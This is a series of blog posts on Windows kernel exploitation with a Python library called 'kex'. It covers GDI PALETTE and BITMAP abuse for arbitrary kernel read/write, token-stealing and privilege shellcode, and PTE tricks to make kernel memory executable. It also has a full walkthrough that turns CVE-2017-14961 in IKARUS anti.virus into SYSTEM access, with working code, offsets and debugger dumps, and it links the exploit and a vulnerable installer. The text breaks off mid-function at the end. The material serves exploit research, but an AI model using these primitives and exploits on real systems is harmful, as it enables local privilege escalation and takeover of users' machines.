Friday, December 1, 2017

kex - python kernel exploit library - update #3

Another week passed, another update. Not sure how long I can keep up with this frequency :)

  • all 3 shellcodes (token stealing, update token privileges, update ACL of target process)
    • padded all of them with NOPs so that their length is divisible by 4. This is required if we use PALETTE objects as the r/w primitive to write the shellcode somewhere: we can only write multiples of 4 bytes with PALETTEs, so if the shellcode length is not divisible by 4, the last few bytes will be missing
    • in newer Windows versions the offset of the KTHREAD->Process pointer is larger than 0x7f (specifically 0xb8), which means that the assembly code is different
      • for offsets <0x80:
        • "\x48\x8b\x40" + 1 byte value (e.g.: 0x7f)
      • for offsets >=0x80:
        • "\x48\x8b\x80" + 1 byte value (e.g.: 0xb8) + "\x00\x00\x00"
  • all 3 shellcodes are verified now to work
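The padding and the two instruction encodings described above can be sketched in a few lines. This is only an illustration: the helper names (pad_to_dword, mov_rax_from_rax_offset) are made up for this example and are not the kex API.

```python
import struct

NOP = b"\x90"

def pad_to_dword(shellcode):
    """Append NOPs until the length is a multiple of 4 (one PALETTEENTRY)."""
    remainder = len(shellcode) % 4
    if remainder:
        shellcode += NOP * (4 - remainder)
    return shellcode

def mov_rax_from_rax_offset(offset):
    """Encode `mov rax, [rax + offset]` with an 8-bit or 32-bit displacement."""
    if offset < 0x80:
        # short form: the displacement fits in one signed byte
        return b"\x48\x8b\x40" + struct.pack("<B", offset)
    # long form: 32-bit little-endian displacement
    return b"\x48\x8b\x80" + struct.pack("<I", offset)

padded = pad_to_dword(b"\xcc" * 5)   # 5 bytes become 8 bytes
short_form = mov_rax_from_rax_offset(0x7f)
long_form = mov_rax_from_rax_offset(0xb8)
```

The long form is three bytes longer, so switching between the two changes the shellcode length and therefore the amount of padding that is needed.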
The new additions are based on the following resources:

  • Leaking NT base, HalDispatchTable, PTE base address using PALETTE objects
  • Calculate PTE address for a given virtual address
  • Ability to change a VA to executable
  • An example for the new functions using the HEVD driver as usual
With that you can write a shellcode to kernel space, change the execution flag in the PTE of its address, update HalDispatchTable and trigger the shellcode - this is what happens in the added example. All of this works from low privilege mode, up to Windows 10 RS3 (v1709 / FCU).
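As a rough illustration of the PTE calculation, here is a minimal sketch of the commonly used formula for x64 with 4 kB pages. The function names and constants are my own for this example and are not the kex API. The fixed PTE base in the example is an assumption that only holds on versions where the base is not randomized; on newer versions the base has to be leaked first.

```python
# Hypothetical helpers, not part of kex.
LEGACY_PTE_BASE = 0xFFFFF68000000000  # assumed fixed base (pre-randomization)
NX_BIT = 1 << 63                      # "no execute" flag, top bit of a PTE

def pte_address(virtual_address, pte_base):
    """One 8-byte PTE per 4 kB page: (VA >> 12) * 8, masked to 48-bit VAs."""
    return pte_base + ((virtual_address >> 9) & 0x7FFFFFFFF8)

def make_executable(pte_value):
    """Return the PTE value with the NX bit cleared."""
    return pte_value & ~NX_BIT

pte = pte_address(0xFFFFF78000000000, LEGACY_PTE_BASE)
print(hex(pte))
```

Reading the 8-byte value at the computed address, passing it through make_executable and writing it back is the "change a VA to executable" step.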

Saturday, November 25, 2017

kex - python kernel exploit library - major update #2

I made a larger update to my kex library again. Token stealing is not the only way to elevate privileges in kernel exploitation; I suggest reading the following:

I essentially implemented additional shellcodes based on Cerrudo's BlackHat talk and Martin Schenk's blogpost. There are a few differences between how I implemented them and how Martin did:

  1. I elevate my own process privileges, not the parent or cmd.exe
  2. I use a different offset in KTHREAD to find the EPROCESS structure (nt!_KTHREAD ->  _KAPC_STATE -> EPROCESS), so you will see different values there
  3. I used PALETTEs for data-only pwning and not the tagWND method, this also means that it won't work beyond Win10 RS3
  4. The token overwrite has been extended to also change the Present bit as it is required after Win10 RS3, as described here:!_SEP_TOKEN_PRIVILEGES-Single_Write_EoP_Protect.pdf
  5. I added all offsets from Win7 to Win10 RS3 so the code should work universally across all platforms

I added an example with the HEVD driver to show how all of this works. I didn't have a chance to test the actual shellcodes, only the data-only variant, so if you run into any issues, let me know.


Wednesday, November 15, 2017

Turning CVE-2017-14961 (IKARUS anti.virus local kernel exploit) into full arbitrary read / write with PALETTE objects

@ParvezGHH discovered 9 exploitable kernel vulnerabilities in IKARUS anti.virus <2.6.18. You can read more about them here:

I found Parvez's exploit for the above CVE very nice and clean; I usually like simplicity. This specific vulnerability lets an attacker write the value 0x11 to an arbitrary location of the attacker's choosing. Triggering it is extremely simple: we send in an empty input, and 0x11 will be written to the address we provide for the output buffer. Parvez used this to overwrite the TOKEN privileges of the given process to gain SeDebugPrivilege and then injected a cmd.exe shellcode into winlogon.exe. Nice and clean, and it works universally. I took the opportunity to write this in Python and extend my kex library with some useful functions that perform the TOKEN lookup and code injection.

However, I wanted to practice kernel exploitation techniques a bit and decided to turn this into a full arbitrary read / write. In short, I wanted to be able to read / write any kernel memory of my choice with the value I want. I also wanted to keep the exploit universal (Win7 to Win10 RS3) and, if possible, trigger it from low integrity mode. I’m not done with the low integrity part, and I will try to finish it later if I have time, but everything else went fine.

A universal read / write is possible if we can use the PALETTE read / write primitives, but obviously we can’t directly overwrite the pFirstColor pointer of any palette with this vulnerability. So I decided to use the idea of an out-of-bounds write, which is commonly used with session pool spraying with GDI objects. Let me explain the game plan step by step.
  1. Allocate two palettes at known locations
  2. Overwrite the cEntries field of one of the palettes, thus increasing its size.
  3. Use the enlarged palette to overwrite the pFirstColor pointer in the second palette -> we are pretty much done at this point, as we can use the regular read / write primitives
  4. Steal token
The first point is achieved by allocating and freeing windows: if they repeatedly get allocated at the same place, we can predict that if we free the window and allocate the palette next, the palette will land at the same location. This works for the large pool, i.e. for object sizes >= 0x1000 (4 kB). This is pretty standard and easy, and it is already implemented in my kex library. Essentially this is the code snippet to do this:

palette_1_address = alloc_free_windows(0)
palette_1_handle = create_palette_with_size(0x1000)
palette_1_pFirstColor = palette_1_address + pFirstColor_offset

palette_2_address = alloc_free_windows(0)
palette_2_handle = create_palette_with_size(0x1000)
palette_2_pFirstColor = palette_2_address + pFirstColor_offset

The second point is to calculate the address where we want to write 0x11. From this point on, we need to make sure that we use the palettes in the right order, as there is no guarantee that palette1 is placed in a lower memory location than palette2, although likely. In this writeup let’s assume that palette1 comes before palette2. So the location is:

palette_1_address + cEntries + 3

The offset of cEntries is always 0x1c, and the number of entries is stored in 4 bytes (32 bits). The +3 is needed in order to overwrite the high-order byte. If we look at a dump, this is what we will get after the overwrite:

0: kd> dd ffffe5b784730000
ffffe5b7`84730000  9c080a13 ffffffff 00000000 00000000
ffffe5b7`84730010  5fe03700 ffffad0d 00000501 110003de
ffffe5b7`84730020  0006e3f4 00000000 00000000 00000000
ffffe5b7`84730030  00000000 00000000 00000000 00000000
ffffe5b7`84730040  00000000 00000000 00000000 00000000
ffffe5b7`84730050  00000000 00000000 00000000 00000000
ffffe5b7`84730060  00000002 00000001 00000000 00000000
ffffe5b7`84730070  00000000 00000000 84730088 ffffe5b7

This effectively increases the size of the palette to 0x110003de * 4 (from 0x000003de * 4) as one palette entry takes 4 bytes. This should be sufficient to get an overlap with palette2.

As for code:
outputbuffer = palette_1_address + 0x1c + 3
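To see why +3 hits the high-order byte, here is a small sketch that replays the single-byte write on the little-endian cEntries value from the dump above. The helper name overwrite_byte is made up for this illustration.

```python
import struct

CENTRIES_OFFSET = 0x1c   # offset of cEntries inside the palette object
WRITTEN_VALUE = 0x11     # the only value the vulnerability lets us write

def overwrite_byte(dword_value, byte_index, new_byte):
    """Replace one byte of a little-endian 32-bit value, as the bug does."""
    raw = bytearray(struct.pack("<I", dword_value))
    raw[byte_index] = new_byte
    return struct.unpack("<I", bytes(raw))[0]

old_entries = 0x000003de
new_entries = overwrite_byte(old_entries, 3, WRITTEN_VALUE)
print(hex(new_entries))        # number of entries after the overwrite
print(hex(new_entries * 4))    # reachable size in bytes (4 bytes per entry)
```

Writing to offset +0 instead would only change the palette to 0x311 entries, which makes it smaller rather than larger.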

The third step is to overwrite the other palette’s pFirstColor pointer and point it to palette1’s pFirstColor memory address. The last part is easy, we just add the proper offset to palette1’s address, which is 0x78 or 0x80 depending on the platform (as of this writing). How do we overwrite palette2’s pFirstColor pointer? We need to calculate the distance of it beginning from palette1’s first entry. The calculation is:

distance = (palette_2_address + pFirstColor_offset) - (palette_1_address + apalColors_offset)

In words: we take the memory location of the target (palette_2_address + pFirstColor_offset) and subtract the memory location of the very first entry of palette1 (palette_1_address + apalColors_offset). apalColors_offset is 0x10 after pFirstColor on x64. We divide this distance by 4 (remember, with palettes we write entries of 4 bytes each) and get the right index (iStart) to use with the SetPaletteEntries function. Code:

address = c_ulonglong(palette_1_pFirstColor)
gdi32.SetPaletteEntries(palette_1_handle, distance/4, sizeof(address)/4, addressof(address));
manager_palette_handle = palette_2_handle
worker_palette_handle = palette_1_handle
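A worked example of the index calculation, as a sketch. The address of palette2 is a made-up value chosen for illustration (palette1 is the address from the dump above), the offsets are the 0x78 / 0x88 pair, and the function name is hypothetical.

```python
PFIRSTCOLOR_OFFSET = 0x78
APALCOLORS_OFFSET = PFIRSTCOLOR_OFFSET + 0x10

def start_index_for_target(palette_1_address, palette_2_address):
    """Index (iStart) in palette1 that lands on palette2's pFirstColor."""
    target = palette_2_address + PFIRSTCOLOR_OFFSET
    first_entry = palette_1_address + APALCOLORS_OFFSET
    distance = target - first_entry
    if distance < 0:
        # palette2 is below palette1: swap the roles of the two palettes
        raise ValueError("palette2 must be located after palette1")
    if distance % 4:
        raise ValueError("target is not aligned to a palette entry")
    return distance // 4

palette_1_address = 0xffffe5b784730000
palette_2_address = 0xffffe5b784731000   # assumed location, for illustration
index = start_index_for_target(palette_1_address, palette_2_address)
print(hex(index))
```

The negative-distance check reflects the ordering caveat mentioned earlier: there is no guarantee that palette1 ends up at the lower address.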

At this stage I ran into a problem where my code started to overwrite random memory locations, regardless of what the distance was (at least this is how it looked). I was pretty sure I was right, and for hours I had no idea what was going wrong. Finally I found it: SetPaletteEntries expects an unsigned INT for the iStart index. I didn’t convert the distance to UINT, so it was passed as a signed INT, and as it was quite large, it pointed to a different place than I expected. This was a good lesson for later: I need to watch out for correct ctypes conversion. So the correct version of the above line is:

gdi32.SetPaletteEntries(palette_1_handle, c_uint(distance/4), sizeof(address)/4, addressof(address));
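The difference between the two conversions is easy to reproduce without touching GDI. The sketch below only shows how ctypes reinterprets the same 32 bits as signed or unsigned; the sample value is arbitrary and not taken from the exploit.

```python
from ctypes import c_int, c_uint

def as_signed(value):
    """How the value looks when it is treated as a C int."""
    return c_int(value).value

def as_unsigned(value):
    """How the value looks when it is treated as a C unsigned int."""
    return c_uint(value).value

sample_index = 0x90000000          # arbitrary large index for illustration
print(as_signed(sample_index))     # negative: the top bit is the sign bit
print(as_unsigned(sample_index))   # unchanged
```

Besides wrapping the argument in c_uint at each call, another option on Windows is to declare the function's argtypes once, so that ctypes converts every argument the same way on every call.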

Once this is done, the only thing that remains is to perform token stealing with palettes. Up to this point the entire exploit runs from low integrity mode as well. The token stealing won’t, because of the way it’s implemented, but I will look for something else later on.

tokenstealing_with_palettes(manager_palette_handle, worker_palette_handle)

I think the above idea can be easily generalised for similar cases, when we can control the memory location of the overwrite, but not the content. If we can increase the size of a palette, we can gain full read / write.

If you want to play with this, the following happens to be an IKARUS 2.6.15 installer, which is vulnerable:

The above exploit is uploaded here:
It doesn't always work on the first try, but run it a few times, and eventually you will get SYSTEM.

UPDATE 2017.11.25.:

With the new release of kex, this exploit can work entirely from low integrity mode.

Tuesday, October 31, 2017

Abusing GDI objects for kernel exploitation - PALETTE and various offsets

I started to dig into the topic of abusing GDI objects for Windows kernel exploitation about two weeks ago, and finally got to PALETTEs. There is a lot of documentation about BITMAPs, so I don’t really want to write about those, but there have been few write-ups about PALETTEs. There are three that I relied on during my research:

I decided to implement PALETTE read-write primitives for my kex Python library, and this post is about how I did that. Basically we need the following info:
  1. What is their size and offset?
  2. How to create them?
  3. How to read / write with them?
Every document I read showed the following structure outline:

typedef struct _PALETTE64
{
    BASEOBJECT64    BaseObject;    // 0x00
    FLONG           flPal;         // 0x18
    ULONG32         cEntries;      // 0x1C
    ULONG32         ulTime;        // 0x20
    HDC             hdcHead;       // 0x24
    ULONG64         hSelected;     // 0x28
    ULONG64         cRefhpal;      // 0x30
    ULONG64         cRefRegular;   // 0x34
    ULONG64         ptransFore;    // 0x3c
    ULONG64         ptransCurrent; // 0x44
    ULONG64         ptransOld;     // 0x4C
    ULONG32         unk_038;       // 0x38
    ULONG64         pfnGetNearest; // 0x3c
    ULONG64         pfnGetMatch;   // 0x40
    ULONG64         ulRGBTime;     // 0x44
    ULONG64         pRGBXlate;     // 0x48
    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90
} PALETTE64;

What is important here is the size of the structure header, which is 0x90 (that is the offset of the PALETTEENTRY array), and the offset of pFirstColor, which points to the array; this is the pointer that needs to be overwritten to get the read / write primitives. It is at offset 0x80 in every document I have seen so far, and what you can read everywhere is that this technique works up to Windows 10 v1709 (RS3), and maybe even later, but we don’t know that yet.

The size of the entire object without the POOL_HEADER is basically this PALETTE64 structure + the PALETTEENTRY array. One PALETTEENTRY is 4 bytes as we can see (this will be important later):

class PALETTEENTRY(Structure):
 _fields_ = [
  ("peRed", BYTE),
  ("peGreen", BYTE),
  ("peBlue", BYTE),
  ("peFlags", BYTE)
 ]

There is a nice implementation made by Sebastian Apelt from Siberas (see the link above), which I also used as my base in my Python implementation. To create a PALETTE, there is a simple API call:

HPALETTE CreatePalette(
  _In_ const LOGPALETTE *lplgpl
);

where LOGPALETTE looks like this:

class LOGPALETTE(Structure):
 _fields_ = [
  ("palVersion", WORD),
  ("palNumEntries", WORD),
 ]

So essentially, to create a PALETTE we need to calculate the size, populate the structure, and call the API, something like this:

pal_cnt = (size - palette_entries_offset) / 4
lPalette = LOGPALETTE()
lPalette.palNumEntries = pal_cnt
lPalette.palVersion = 0x300
palette_handle = gdi32.CreatePalette(byref(lPalette))

As the PALETTEENTRY is 4 bytes, we need to calculate the proper number of entries required for us to reserve the proper size.
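The entry count calculation on its own, as a sketch. The function name is made up for this example, and the 0x90 offset is the one from the structure outline above; the limit check follows from palNumEntries being a WORD.

```python
PALETTEENTRY_SIZE = 4
MAX_ENTRIES = 0xFFFF   # palNumEntries is a 16-bit WORD

def palette_entry_count(allocation_size, palette_entries_offset):
    """Number of entries needed so header + entries == allocation_size."""
    data_size = allocation_size - palette_entries_offset
    if data_size <= 0:
        raise ValueError("allocation is smaller than the palette header")
    count = data_size // PALETTEENTRY_SIZE
    if count > MAX_ENTRIES:
        raise ValueError("too many entries for a single palette")
    return count

count = palette_entry_count(0x1000, 0x90)
print(hex(count))
```

Requested sizes that do not leave a multiple of 4 bytes for the entries are rounded down by the integer division, so the resulting object can be up to 3 bytes smaller than requested.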

With the palettes created, we can start to read / write as soon as we have overwritten the manager palette’s pFirstColor pointer. To perform these actions we can use the following functions.

UINT GetPaletteEntries(
  _In_  HPALETTE       hpal,
  _In_  UINT           iStartIndex,
  _In_  UINT           nEntries,
  _Out_ LPPALETTEENTRY lppe
);

UINT SetPaletteEntries(
  _In_       HPALETTE     hpal,
  _In_       UINT         iStart,
  _In_       UINT         cEntries,
  _In_ const PALETTEENTRY *lppe
);

These can be used just as we used GetBitmapBits / SetBitmapBits. There is an important difference: here we tell the function to read X number of PALETTEENTRYs, each of which is 4 bytes long. This means that if we want to read 8 bytes (an address on x64), we need to provide the value 2, i.e. the size divided by 4. That’s it, after that it’s essentially the same. Here is my Python implementation:

def set_address_palette(manager_palette_handle, address):
 # point the worker palette's pFirstColor to the target address
 address = c_ulonglong(address)
 gdi32.SetPaletteEntries(manager_palette_handle, 0, sizeof(address)//4, addressof(address))

def write_memory_palette(manager_palette_handle, worker_palette_handle, dst, src, len):
 # len is in bytes; PALETTEs transfer whole 4-byte entries
 set_address_palette(manager_palette_handle, dst)
 gdi32.SetPaletteEntries(worker_palette_handle, 0, len//4, src)

def read_memory_palette(manager_palette_handle, worker_palette_handle, src, dst, len):
 set_address_palette(manager_palette_handle, src)
 gdi32.GetPaletteEntries(worker_palette_handle, 0, len//4, dst)

And basically that’s it; this works essentially the same way as with BITMAPs. You can leak the kernel address of the object with Window objects just as we did with BITMAPs on Win10 v1703 (or earlier). This leak will also work on Win10 v1709.
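The manager / worker idea can be tried out without a kernel. The following is a toy simulation only: a bytearray stands in for kernel memory, addresses are plain offsets into it, and all class and function names are invented for this sketch. Nothing here calls the real GDI functions.

```python
import struct

class FakeKernel(object):
    """Flat bytearray standing in for kernel memory."""
    def __init__(self, size):
        self.memory = bytearray(size)

    def read_qword(self, address):
        return struct.unpack_from("<Q", self.memory, address)[0]

    def write_qword(self, address, value):
        struct.pack_into("<Q", self.memory, address, value)

class FakePalette(object):
    """Palette whose pFirstColor pointer is stored in the fake memory."""
    def __init__(self, kernel, pfirstcolor_address):
        self.kernel = kernel
        self.pfirstcolor_address = pfirstcolor_address

    def set_entries(self, start, count, data):
        base = self.kernel.read_qword(self.pfirstcolor_address) + start * 4
        self.kernel.memory[base:base + count * 4] = data[:count * 4]

    def get_entries(self, start, count):
        base = self.kernel.read_qword(self.pfirstcolor_address) + start * 4
        return bytes(self.kernel.memory[base:base + count * 4])

def write_memory(manager, worker, dst, data):
    manager.set_entries(0, 2, struct.pack("<Q", dst))  # aim the worker
    worker.set_entries(0, len(data) // 4, data)        # whole entries only

def read_memory(manager, worker, src, length):
    manager.set_entries(0, 2, struct.pack("<Q", src))
    return worker.get_entries(0, length // 4)

kernel = FakeKernel(0x1000)
WORKER_PFIRSTCOLOR = 0x100    # where the worker's pFirstColor is stored
MANAGER_PFIRSTCOLOR = 0x200   # where the manager's pFirstColor is stored
kernel.write_qword(WORKER_PFIRSTCOLOR, 0x300)
# the corrupted pointer: the manager's entries now overlay the worker's pointer
kernel.write_qword(MANAGER_PFIRSTCOLOR, WORKER_PFIRSTCOLOR)

manager = FakePalette(kernel, MANAGER_PFIRSTCOLOR)
worker = FakePalette(kernel, WORKER_PFIRSTCOLOR)
write_memory(manager, worker, 0x800, b"ABCDEFGH")
result = read_memory(manager, worker, 0x800, 8)
```

Writing a 6-byte buffer with write_memory only stores the first 4 bytes, which is why data written through palettes needs a length that is a multiple of 4.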

Wish everything was so simple!

So I started to test this on Win10 v1511, and it worked on the first try! Nice! I was happy :) It took some time to build a Win10 v1709 machine, so I went ahead and ran the same exploit on Win10 v1607, and…. BSOD!! I ran it again, and got a BSOD again with POOL corruption. So I started to dig into what was going on, as I was pretty sure I was overwriting something wrong. Notice the problem?

0: kd> dc ffff89c9c4611000
ffff89c9`c4611000  7e08083b 00000000 00000000 00000000  ;..~............
ffff89c9`c4611010  d9c0a080 ffff910b 00000501 000003de  ................
ffff89c9`c4611020  00003868 00000000 00000000 00000000  h8..............
ffff89c9`c4611030  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611040  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611050  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611060  00000002 00000001 00000000 00000000  ................
ffff89c9`c4611070  00000000 00000000 c4611088 ffff89c9  ..........a.....
ffff89c9`c4611080  c4611000 ffff89c9 00000000 00000000  ................

0: kd> !pool ffff89c9c4611000
Pool page ffff89c9c4611000 region is Unknown
ffff89c9c4611000 is not a valid large pool allocation, checking large session pool...
*ffff89c9c4611000 : large page allocation, tag is Gh08, size is 0x1010 bytes
  Pooltag Gh08 : GDITAG_HMGR_PAL_TYPE, Binary : win32k.sys

So this is the end of the PALETTE64 structure:

    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

This doesn’t align with the output from WinDBG dump. So it turns out the new offsets are:

    PALETTEENTRY    *pFirstColor;  // 0x78
    struct _PALETTE *ppalThis;     // 0x80
    PALETTEENTRY    apalColors[3]; // 0x88

I didn’t check what is missing or what became smaller, but from Win10 v1607 this is the correct offset, including v1709.
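The offsets can also be read back from the v1607 dump above mechanically. The sketch below rebuilds the first 0x90 bytes from the dwords shown in the dump and looks for 8-byte values that point back into the object; the function name is made up for this illustration.

```python
import struct

DUMP_BASE = 0xffff89c9c4611000
# dwords copied from the `dc` output above (offsets 0x00 to 0x8f)
DUMP_DWORDS = [
    0x7e08083b, 0x00000000, 0x00000000, 0x00000000,
    0xd9c0a080, 0xffff910b, 0x00000501, 0x000003de,
    0x00003868, 0x00000000, 0x00000000, 0x00000000,
] + [0] * 12 + [
    0x00000002, 0x00000001, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0xc4611088, 0xffff89c9,
    0xc4611000, 0xffff89c9, 0x00000000, 0x00000000,
]
raw = struct.pack("<%dI" % len(DUMP_DWORDS), *DUMP_DWORDS)

def find_self_pointers(raw, base):
    """Return (field offset, pointed-to offset) for pointers into the object."""
    found = []
    for offset in range(0, len(raw), 8):
        value = struct.unpack_from("<Q", raw, offset)[0]
        if base <= value < base + len(raw):
            found.append((offset, value - base))
    return found

pointers = find_self_pointers(raw, DUMP_BASE)
c_entries = struct.unpack_from("<I", raw, 0x1c)[0]
print([(hex(a), hex(b)) for a, b in pointers], hex(c_entries))
```

The pointer at 0x78 targets offset 0x88 (pFirstColor pointing at apalColors) and the one at 0x80 targets the object itself (ppalThis). The cEntries value also agrees with the new layout, since (0x1000 - 0x88) / 4 is 0x3de.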

Sweet, so now that is fixed, I got this working on v1607 and v1703, but it broke on v1709! It didn’t BSOD but I couldn’t leak the address anymore! What? Everyone said it works! Ok, let’s see the Window leak. The offsets changed there at version v1703, so there was a good chance they did again on v1709. Essentially:

Windows 10x64 v1607 and earlier (? - only tested back to v1511, not sure on Win8 or 7):
pcls = 0x98
lpszMenuNameOffset = 0x88

Windows10x64 v1703:
pcls = 0xa8
lpszMenuNameOffset = 0x90

Windows10x64 v1709:
pcls = 0xa8
lpszMenuNameOffset = 0x98

Once I fixed these as well, all started to work.
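One way to keep such version-dependent values manageable is a small lookup table. This is just a sketch with invented names, not how kex stores them; it contains only the values listed above, with v1511 mapped to the v1607 values because that is the oldest version I tested.

```python
# Hypothetical lookup table; keys are Windows 10 x64 version strings.
WINDOW_LEAK_OFFSETS = {
    "1511": {"pcls": 0x98, "lpszMenuName": 0x88},
    "1607": {"pcls": 0x98, "lpszMenuName": 0x88},
    "1703": {"pcls": 0xa8, "lpszMenuName": 0x90},
    "1709": {"pcls": 0xa8, "lpszMenuName": 0x98},
}

def window_leak_offsets(version):
    """Return the offsets for a version, failing loudly for unknown ones."""
    try:
        return WINDOW_LEAK_OFFSETS[version]
    except KeyError:
        raise KeyError("no window leak offsets recorded for v%s" % version)

offsets = window_leak_offsets("1709")
print(hex(offsets["pcls"]), hex(offsets["lpszMenuName"]))
```

Failing on an unknown version is deliberate: guessing an offset in the kernel usually ends in a BSOD rather than in a clean error.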

I checked and the structure offsets required for token stealing didn’t change, so essentially that was all.

Structure offsets change too often, and sometimes it’s not easy to track them down. This is one of the reasons I’m trying to make 'kex' and hardcode all these offsets, so I can make OS-independent exploits. With the current version you can call these functions on any version of Win10x64 covered above and get them to work reliably. Link: GitHub - theevilbit/kex

In order to make it easier for people contributing to offsets, and also make it easier for those, who want to code the same in different languages, I’m starting an offset table on the same GitHub repo. Directly:

Saturday, October 28, 2017

kex - python kernel exploit library - major update

I made a major update to my Python kernel exploitation 'library' (kex). In short:

  • GDI abuse functions (original source:
  • Wrapper functions for GDI abuse to mask the platform (Will work from Win7x64 to Win10x64 v1703 universally using different methods based on the platform)
  • Calculate bitmap sizes based on platform (Win7x64 SP1 - Win10 v1607)
  • Added lots of x64 struct constants (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token)
  • Lots of comments
I also uploaded an example to show how it can ease exploit development. The use case is the HackSysExtremeVulnerableDriver arbitrary overwrite, which the example exploits with GDI abuse. Under the hood it uses different techniques depending on the platform.


Some items from my todo list:
  • pool spraying with bitmaps
  • PALETTE objects
  • other kernel pool spraying techniques
  • enable GDI abuse techniques for x86
If I made any errors submit a pull request or leave a comment.

Friday, October 27, 2017

Abusing GDI objects: Bitmap object’s size in the kernel pool

I’m looking into the GDI object abuse techniques for kernel pool exploitation, and found that there is no documentation about how much memory is allocated for the Bitmap object in the kernel paged pool. I read through many exploits and articles, but it seemed that everyone is doing this by trial and error, so I decided to take a look and try to find the logic in the allocation.

The function to create a bitmap is:

HBITMAP CreateBitmap(
  _In_ int nWidth,
  _In_ int nHeight,
  _In_ UINT cPlanes,
  _In_ UINT cBitsPerPel,
  _In_ const VOID *lpvBits
);

Every code I saw sets the cPlanes to “1” and the *lpvBits to NULL, so let’s ignore them, and use that setting. The rest of the variables are related to the bitmap’s actual size, and it makes perfect sense for those to affect the object size allocated.

We will also need to distinguish between two cases:
  1. When the bitmap < 0x1000
  2. When the bitmap >= 0x1000, in this case the allocation goes to the large paged pool allocation table
Let’s start with the first one, and try a few cases on Windows 10x64 v1511. My first try is:
create_bitmap(820, 2, 8)

nWidth = 820
nHeight = 2
cBitsPerPel = 8

I use some functions to leak the address to the kernel so I can easily find it. Unfortunately WinDBG is not really helpful with the !pool, !poolfind, etc… commands (they don’t work) and I’m not sure why. Also the dt nt!_POOL_HEADER returns:

Symbol nt!_POOL_HEADER not found.

So I need to do this the hard way. This is the dump of the bitmap with the POOL_HEADER, which is the first 0x10 bytes. It is followed by the Bitmap object. The pvscan0 value, which is usually the most interesting to everyone, points to offset 0x258 from the beginning of the OBJECT (SURFACE64 in this case - obviously this symbol is also not found by WinDBG, why would it ease things…).

kd> dc 0xfffff90144314010-10
fffff901`44314000  238d0000 35306847 00000000 00000000  ...#Gh05........
fffff901`44314010  060509ac 00000000 00000000 00000000  ................
fffff901`44314020  00000000 00000000 00000000 00000000  ................
fffff901`44314030  060509ac 00000000 00000000 00000000  ................
fffff901`44314040  00000000 00000000 00000334 00000002  ........4.......
fffff901`44314050  00000668 00000000 44314268 fffff901  h.......hB1D....
fffff901`44314060  44314268 fffff901 00000334 00002402  hB1D....4....$..
fffff901`44314070  00000003 00010000 00000000 00000000  ................

If I take the size of the bitmap: (820 x 2 x 8) / 8 bits = 0x668
SURFACE64 + STUFF = 0x258
POOL_HEADER = 0x10
This sums up to 0x8d0, and if we check:

kd> dc 0xfffff90144314010-10+8d0 L4
fffff901`443148d0  0073008d 00000000 00000000 00000000  ..s.............

The next POOL_HEADER indeed reports that the previous pool size is 0x8d (x 0x10) = 0x8d0, so it looks like the above calculation is about right, but we will need to refine it.

create_bitmap(1000, 2, 8)
Here we need to refine it a bit:
BITMAP: (1000 x 2 x 8) / 8 bits = 0x7d0
SURFACE64 + STUFF = 0x258
POOL_HEADER = 0x10
If we sum these, they add up to 0xa38, however we need to pad it so that:
SIZE mod 0x10 = 0
Which gives us 0xa40
and indeed we can see this:

kd> dc 0xfffff90140764010-0x10
fffff901`40764000  23a40000 35306847 9bbcb758 8476aa01  ...#Gh05X.....v.
fffff901`40764010  da0530cd ffffffff 00000000 00000000  .0..............
fffff901`40764020  00000000 00000000 00000000 00000000  ................
fffff901`40764030  da0530cd ffffffff 00000000 00000000  .0..............
fffff901`40764040  00000000 00000000 000003e8 00000002  ................
fffff901`40764050  000007d0 00000000 40764268 fffff901  ........hBv@....
fffff901`40764060  40764268 fffff901 000003e8 000090b3  hBv@............
fffff901`40764070  00000003 00010000 00000000 00000000  ................

kd> dc 0xfffff90140764010-0x10+a40
fffff901`40764a40  001600a4 65657246 742b06f2 fffff802  ....Free..+t....
fffff901`40764a50  422a8470 fffff901 40788470 fffff901  p.*B....p.x@....
fffff901`40764a60  00000000 00000000 00000000 00000000  ................
fffff901`40764a70  00000000 00000000 00000000 00000000  ................
fffff901`40764a80  00000000 00000000 00000000 00000000  ................
fffff901`40764a90  00000000 00000000 00000000 00000000  ................
fffff901`40764aa0  423d2018 fffff901 000000c2 000001fe  . =B............
fffff901`40764ab0  00000087 00000000 423d2138 fffff901  ........8!=B....

Let’s see if it works in reverse:
I want an allocation of size 0xe70; the following should do it:
create_bitmap(0xc08, 1, 8)
and it works:

lkd> dc 0xFFFFF901407D1010-10
fffff901`407d1000  23e70000 35306847 00000000 00000000  ...#Gh05........
fffff901`407d1010  08050a4b 00000000 00000000 00000000  K...............
fffff901`407d1020  00000000 00000000 00000000 00000000  ................
fffff901`407d1030  08050a4b 00000000 00000000 00000000  K...............
fffff901`407d1040  00000000 00000000 00000c08 00000001  ................
fffff901`407d1050  00000c08 00000000 407d1268 fffff901  ........h.}@....
fffff901`407d1060  407d1268 fffff901 00000c08 00002ea2  h.}@............
fffff901`407d1070  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF901407D1010-10+e70
fffff901`407d1e70  001900e7 00000000 00000000 00000000  ................
fffff901`407d1e80  407d3e80 fffff901 407cfe80 fffff901  .>}@......|@....
fffff901`407d1e90  00000000 00000000 00000000 00000000  ................
fffff901`407d1ea0  00000000 00000000 00000000 00000000  ................
fffff901`407d1eb0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ec0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ed0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ee0  00000000 00000000 00000000 00000000  ................

So the function would be:

def allocate_bitmap_with_given_size(s):
 width = s - 0x258 - 0x10
 create_bitmap (width, 1, 8)
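The arithmetic from the three experiments above can be checked in both directions with a short sketch. The function names are made up, the constants are the v1511 values measured above, and scanline padding is ignored, which is an assumption that matches the widths used in these tests.

```python
POOL_HEADER_SIZE = 0x10
SURFACE_HEADER_SIZE = 0x258   # SURFACE64 + STUFF on Win10 x64 v1511
POOL_GRANULARITY = 0x10

def align_up(value, alignment):
    return (value + alignment - 1) & ~(alignment - 1)

def bitmap_pool_size(width, height, bits_per_pel):
    """Expected pool chunk size for a small bitmap, POOL_HEADER included."""
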